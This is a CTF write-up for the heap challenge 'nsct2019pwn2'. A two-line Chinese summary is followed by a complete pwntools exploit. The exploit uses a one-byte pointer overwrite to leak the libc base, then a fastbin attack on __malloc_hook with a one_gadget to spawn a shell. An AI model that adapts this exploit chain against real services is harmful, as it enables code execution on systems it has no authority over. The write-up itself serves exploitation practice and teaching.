思路
先用单字节改写 note 指针，free 掉一个 unsorted 大小（0x90）的 chunk 后 show 出其 fd（main_arena+88）来泄漏 libc 基址；再用 fastbin attack 把 0x70 大小的 chunk 分配到 __malloc_hook-0x23，往 __realloc_hook 写 one_gadget、往 __malloc_hook 写 realloc+16 调整栈后，再 malloc 一次即可触发。
exp:
#!/usr/bin/python2
from pwn import *
local = 1  # 1: debug against a local copy; anything else: the BUUOJ instance
elf = ELF('./nsct2019pwn2')
# NOTE(review): elf.libc is the libc the *local* loader would map for this
# binary. In the remote branch that is only correct when the target ships the
# same glibc build; otherwise point `libc` at the target's libc.so.6 (the
# hardcoded one_gadget offsets further down assume that same build too).
libc = elf.libc
if local == 1:
    p = process('./nsct2019pwn2')
else:
    p = remote('node3.buuoj.cn', 28015)
def add(size):
    """Menu 1: allocate a note; the binary then prompts for its size."""
    choice = '1'
    p.sendlineafter('6.exit', choice)
    p.sendlineafter('size', str(size))
def delete():
    """Menu 2: free the current note (no index is sent, the binary keeps one)."""
    choice = '2'
    p.sendlineafter('6.exit', choice)
def updatename(name):
    """Menu 4: overwrite the name buffer with *name*.

    Uses send(), not sendline(): the payloads below are exactly 0x31 bytes
    (0x30 filler + one byte of pointer), so a trailing newline must not be
    appended to the data.
    """
    menu, prompt = '6.exit', 'name'
    p.sendlineafter(menu, '4')
    p.sendafter(prompt, name)
def show():
    """Menu 3: print the current note; the caller parses what comes back."""
    choice = '3'
    p.sendlineafter('6.exit', choice)
def edit(note):
    """Menu 5: write *note* (newline-terminated) into the current note chunk."""
    menu, prompt = '6.exit', 'note'
    p.sendlineafter(menu, '5')
    p.sendlineafter(prompt, note)
def lg(address, data):
    """Log *data* as a hex value labelled *address* (pwntools success line)."""
    log.success('%s: ' % (address) + hex(data))
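def libc_base_from_leak(leaked_ptr, malloc_hook_off):
    """Convert the pointer read back from the freed chunk into the libc base.

    The arithmetic encodes two glibc-2.23 layout facts the leak relies on:
    the leaked value is ``main_arena + 88`` (the unsorted-bin head a freed
    unsorted chunk's fd points at) and ``main_arena`` sits 0x10 past
    ``__malloc_hook``.  Hence base = leak - 88 - malloc_hook_off - 0x10.

    Args:
        leaked_ptr: the 8-byte pointer parsed from the show() output.
        malloc_hook_off: libc.sym['__malloc_hook'], i.e. its offset from base.
    Returns:
        The libc load address; a correct leak yields a page-aligned value.
    """
    return leaked_ptr - 88 - malloc_hook_off - 0x10


def exp():
    """Run the whole chain: pointer redirect -> libc leak -> fastbin dup on __malloc_hook.

    Uses the module globals p / libc and the menu helpers. Stage 1 leaks libc
    through a freed unsorted chunk, stage 2 poisons a 0x70 fastbin so malloc
    hands out a fake chunk overlapping __realloc_hook/__malloc_hook.
    NOTE(review): the one-byte name overwrites assume the binary stores its
    note pointer right after the 0x30-byte name; inferred from the payload
    layout, confirm against the binary.
    """
    p.recvuntil('name')
    p.sendline('doudou')

    # --- stage 1: libc leak ------------------------------------------------
    add(0x90)   # 0xa0 chunk: too large for a fastbin, so free() sends it to unsorted
    add(0x18)   # small neighbour so the 0xa0 chunk is not merged into top on free
    # Partial (1-byte) overwrite of the pointer stored after the name; the
    # exact bytes (0x10 / 0x40) are heap-layout dependent.
    updatename('a' * 0x30 + '\x10')
    delete()    # frees the 0xa0 chunk; its fd now holds main_arena+88
    add(0x20)
    updatename('a' * 0x30 + '\x40')
    show()
    # recvuntil('\x7f') keys on the top byte of a userland pointer; a stray
    # 0x7f earlier in the output would make the slice garbage, hence the check.
    leak = u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00'))
    libcbase = libc_base_from_leak(leak, libc.sym['__malloc_hook'])
    lg('libcbase', libcbase)
    if libcbase & 0xfff:
        log.error('libc base %#x is not page-aligned: leak mis-parsed' % libcbase)

    # --- stage 2: fastbin attack on __malloc_hook ---------------------------
    # one_gadget candidates; these values match the well-known Ubuntu 16.04
    # glibc-2.23 set - regenerate with `one_gadget` if the libc differs.
    o_g = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
    one_gadget = libcbase + o_g[1]
    malloc_hook = libcbase + libc.sym['__malloc_hook']
    realloc = libcbase + libc.sym['__libc_realloc']
    add(0x68)   # 0x70 chunk -> fastbin sized
    delete()    # into the 0x70 fastbin
    add(0x10)
    updatename('a' * 0x30 + '\x40')   # re-point the note at the freed 0x70 chunk
    # Poison fd. malloc_hook-0x23 is the usual fake chunk: its size field
    # reads as 0x7f (a byte of a libc pointer), which the fastbin size check
    # for the 0x70 bin accepts.
    edit(p64(malloc_hook - 0x23))
    add(0x68)   # returns the real chunk
    add(0x68)   # returns the fake chunk; its user data starts at malloc_hook-0x13
    # -0x13 + 11 == -0x8 == __realloc_hook, and the next qword is __malloc_hook.
    # malloc -> __malloc_hook (realloc+16, presumably skipping realloc's
    # prologue pushes to satisfy the one_gadget stack constraint) ->
    # realloc -> __realloc_hook -> one_gadget.
    edit('a' * 11 + p64(one_gadget) + p64(realloc + 16))
    add(1)      # same two sends as the original inline menu walk; any malloc fires the hooks
    p.interactive()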
if __name__ == "__main__":
    exp()  # runs the full chain; p.interactive() at its end hands over the shell